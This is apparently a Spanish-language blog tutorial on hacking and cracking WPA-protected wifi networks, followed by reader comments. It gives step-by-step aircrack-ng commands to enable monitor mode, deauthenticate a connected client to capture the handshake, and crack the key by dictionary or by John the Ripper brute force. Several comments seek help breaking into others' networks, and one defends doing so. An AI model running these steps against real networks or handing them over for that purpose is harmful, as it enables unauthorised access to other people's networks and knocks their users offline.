DICCIONARIOS WPA

Tutoriales y recursos de hacking wifi

Hackear y crackear red wifi WPA

¿Qué es WPA?

WPA es la abreviatura de Wifi Protect Access, y consiste en un mecanismo de control de acceso a una red inalámbrica, pensado con la idea de eliminar las debilidades de WEP. También se le conoce con el nombre de TSN (Transition Security Network).

¿Qué haremos

Hackearemos y crackearemos una red inalambrica con seguridad WPA activada. El tutorial abarca dos opciones: Con diccionarios y con bruteforce. Igualmente está escrito para ejecutarlo en el sistema operativo Ubuntu 10.04 de Linux.

¿Cómo lo haremos?

Para realizar el crackeo de una red inalambrica con seguridad WPA habilitada tendremos que capturar una clave llamada Handshake, a través de ella nos será posible realizar el crackeo tanto con diccionarios o con bruteforce. Para esto, es necesario que un cliente esté conectado a la red.
Utilizaremos la suite aircrack-ng. El crackeo funciona en PSK, TKIP y AES/CCMP.

Comenzamos

Abrimos la terminal, especificaré cuando es necesario abrir otra terminal o una nueva pestaña. Necesitarás ser siempre super usuario:

sudo su

Activamos modo monitor:

airmon-ng start wlan0

Monitoremos:

airodump-ng mon0

De preferencia abrimos un editor de texto y llenamos los siguientes campos:

  • ESSID: Nombre de la red
  • BSSID: Clave de este estilo: 00:11:22:33:44:55
  • Channel: Canal donde se encuentra
  • Station: Está en la segunda linea, hay una columna llamada Station (00:11:22:33:44:55) debe de indicar el mismo BSSID de la red que queremos atacar.

Tecleamos la combinación Control + C para detener el proceso.

Nos conectamos:

airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID] mon0

Abrimos nueva terminal.

Des-autenticamos para obtener el famoso Handshake

aireplay-ng --deauth 1 -a [BSSID] -c [Station] mon0

Regresamos a la primera terminal y veremos en la esquina superior derecha algo así:

WPA handshake: [00:11:22:33:44:55]

Aquí van las dos opciones de crackeo:

Diccionario

Buscamos por la red, descargamos un buen diccionario y corremos:

aircrack-ng [ESSID]*.cap -w [Ruta diccionario]

Y obtendremos la clave, dependiendo que tan larga y complicada esté o que tan bueno esté el diccionario.

Fuerza Bruta

Utilizaremos John The Ripper. Para instalarlo escribimos:

sudo apt-get install john

Para crackear la red lo utilizamos de esta manera:

john -incremental=all --stdout | aircrack-ng -w - -e [ESSID] -a 2 [ESSID]*.cap

Personalmente recomiendo el método de diccionarios, la fuerza bruta puede tardar desde unos minutos, hasta días, semanas y meses.

Desgraciadamente, van pasando los años y la tecnología avanza, todo es crackeable, por lo menos de alguna manera.

  • Roberto says:

    Excelente tutorial solo hace falta especificar que para desautenticar tienes que tomar el MAC de algun usuario que este conectado y que el airodump-ng alla detectato en la parte inferior del mismo, ya qu seguro hay algun nuevo usuario que no sabe eso.

    • javi says:

      hola roberto me podrias ayudar con el tema del wpa tengo el wifiway no se si con ese se podra conseguir la clave muchas gracias saludos

      • javi says:

        o si me envias un tuto para poder hacerlo

  • Carlos says:

    Muy buen tutorial, llego hasta el paso de des-autenticacion, me muestra lo siguiente:
    Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
    mon0 is on channel -1, but the AP uses channel 9

    y no muestra el WPA handshake en la otra terminal, que me hace falta? gracias

  • Cabrones de Mierda says:

    Cabrones Ladrones de Mierda … Porque no utilizais vuestro propio wifi y dejais de fastidiar a los demas?

  • RBG says:

    mmmm depende de la maldad k corra por los cocos de la gente puedes utilizar estos comentarios para aprender a proteger tu wifi yo no lo veo como una forma de robo.

    “Si dejas las cosas en la calle para k otro las pueda coger,no es robo si no uso”

  • john says:

    hola. mira eh seguido el tutorial al pie de la raya pero en la opcion de 1
    aireplay-ng –deauth 1 -a [BSSID] -c [Station] mon0 me sale esto 00:43:58 Waiting for beacon frame (BSSID: 64:68:0C:81:8E:DA) on channel 1
    00:43:59 Sending 64 directed DeAuth. STMAC: [5C:AC:4C:A7:E8:E0] [ 0|63 ACKs]

    pero claro al volver a la otra ventana de la terminal no me aparece lo del WPA handshake. si tienes alguna solucion me seria de mucha ayuda y gracias de antemano

Your email address will not be published. Required fields are marked *

*